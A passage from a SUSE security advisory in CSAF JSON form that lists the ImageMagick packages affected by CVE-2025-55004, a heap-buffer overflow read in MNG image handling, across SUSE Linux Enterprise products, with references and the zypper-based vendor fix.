"name": "libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64 as component of SUSE Linux Enterprise Server for SAP Applications 15 SP5",
"product_id": "SUSE Linux Enterprise Server for SAP Applications 15 SP5:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64"
},
"product_reference": "libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64",
"relates_to_product_reference": "SUSE Linux Enterprise Server for SAP Applications 15 SP5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.ppc64le as component of SUSE Linux Enterprise Server for SAP Applications 15 SP5",
"product_id": "SUSE Linux Enterprise Server for SAP Applications 15 SP5:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.ppc64le"
},
"product_reference": "libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.ppc64le",
"relates_to_product_reference": "SUSE Linux Enterprise Server for SAP Applications 15 SP5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64 as component of SUSE Linux Enterprise Server for SAP Applications 15 SP5",
"product_id": "SUSE Linux Enterprise Server for SAP Applications 15 SP5:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64"
},
"product_reference": "libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64",
"relates_to_product_reference": "SUSE Linux Enterprise Server for SAP Applications 15 SP5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "perl-PerlMagick-7.1.0.9-150400.6.40.1.ppc64le as component of SUSE Linux Enterprise Server for SAP Applications 15 SP5",
"product_id": "SUSE Linux Enterprise Server for SAP Applications 15 SP5:perl-PerlMagick-7.1.0.9-150400.6.40.1.ppc64le"
},
"product_reference": "perl-PerlMagick-7.1.0.9-150400.6.40.1.ppc64le",
"relates_to_product_reference": "SUSE Linux Enterprise Server for SAP Applications 15 SP5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "perl-PerlMagick-7.1.0.9-150400.6.40.1.x86_64 as component of SUSE Linux Enterprise Server for SAP Applications 15 SP5",
"product_id": "SUSE Linux Enterprise Server for SAP Applications 15 SP5:perl-PerlMagick-7.1.0.9-150400.6.40.1.x86_64"
},
"product_reference": "perl-PerlMagick-7.1.0.9-150400.6.40.1.x86_64",
"relates_to_product_reference": "SUSE Linux Enterprise Server for SAP Applications 15 SP5"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2025-55004",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-55004"
}
],
"notes": [
{
"category": "general",
"text": "ImageMagick is free and open-source software used for editing and manipulating digital images. Prior to version 7.1.2-1, ImageMagick is vulnerable to heap-buffer overflow read around the handling of images with separate alpha channels when performing image magnification in ReadOneMNGIMage. This can likely be used to leak subsequent memory contents into the output image. This issue has been patched in version 7.1.2-1.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:ImageMagick-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:ImageMagick-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:ImageMagick-devel-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:ImageMagick-devel-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:libMagick++-devel-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:libMagick++-devel-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:perl-PerlMagick-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:perl-PerlMagick-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:ImageMagick-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:ImageMagick-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:ImageMagick-devel-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:ImageMagick-devel-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:libMagick++-devel-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:libMagick++-devel-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:perl-PerlMagick-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:perl-PerlMagick-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:ImageMagick-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:ImageMagick-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:ImageMagick-devel-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:ImageMagick-devel-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:libMagick++-devel-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:libMagick++-devel-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:perl-PerlMagick-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:perl-PerlMagick-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:ImageMagick-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:ImageMagick-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:ImageMagick-devel-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:ImageMagick-devel-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:libMagick++-devel-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:libMagick++-devel-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:perl-PerlMagick-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:perl-PerlMagick-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Module for Desktop Applications 15 SP6:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Module for Desktop Applications 15 SP6:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Module for Desktop Applications 15 SP6:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Module for Desktop Applications 15 SP6:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Module for Desktop Applications 15 SP7:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Module for Desktop Applications 15 SP7:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Module for Desktop Applications 15 SP7:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Module for Desktop Applications 15 SP7:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:ImageMagick-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:ImageMagick-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP4-LTSS:ImageMagick-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP4-LTSS:ImageMagick-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP4-LTSS:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP4-LTSS:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP4-LTSS:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP4-LTSS:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:ImageMagick-devel-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:ImageMagick-devel-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP4-LTSS:ImageMagick-devel-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP4-LTSS:ImageMagick-devel-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP4-LTSS:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP4-LTSS:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:libMagick++-devel-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:libMagick++-devel-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP4-LTSS:libMagick++-devel-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP4-LTSS:libMagick++-devel-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP4-LTSS:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP4-LTSS:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP4-LTSS:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP4-LTSS:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:perl-PerlMagick-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:perl-PerlMagick-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP4-LTSS:perl-PerlMagick-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP4-LTSS:perl-PerlMagick-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:ImageMagick-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:ImageMagick-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP5-LTSS:ImageMagick-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP5-LTSS:ImageMagick-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP5-LTSS:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP5-LTSS:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP5-LTSS:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP5-LTSS:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:ImageMagick-devel-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:ImageMagick-devel-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP5-LTSS:ImageMagick-devel-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP5-LTSS:ImageMagick-devel-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP5-LTSS:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP5-LTSS:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:libMagick++-devel-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:libMagick++-devel-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP5-LTSS:libMagick++-devel-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP5-LTSS:libMagick++-devel-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP5-LTSS:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP5-LTSS:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP5-LTSS:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP5-LTSS:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:perl-PerlMagick-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:perl-PerlMagick-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP5-LTSS:perl-PerlMagick-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP5-LTSS:perl-PerlMagick-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:ImageMagick-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:ImageMagick-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:ImageMagick-devel-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:ImageMagick-devel-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:libMagick++-devel-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:libMagick++-devel-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:perl-PerlMagick-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:perl-PerlMagick-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:ImageMagick-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:ImageMagick-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:ImageMagick-devel-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:ImageMagick-devel-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:libMagick++-devel-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:libMagick++-devel-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:perl-PerlMagick-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:perl-PerlMagick-7.1.0.9-150400.6.40.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-55004",
"url": "https://www.suse.com/security/cve/CVE-2025-55004"
},
{
"category": "external",
"summary": "SUSE Bug 1248076 for CVE-2025-55004",
"url": "https://bugzilla.suse.com/1248076"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:ImageMagick-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:ImageMagick-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:ImageMagick-devel-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:ImageMagick-devel-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:libMagick++-devel-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:libMagick++-devel-7.1.0.9-150400.6.40.1.x86_64",
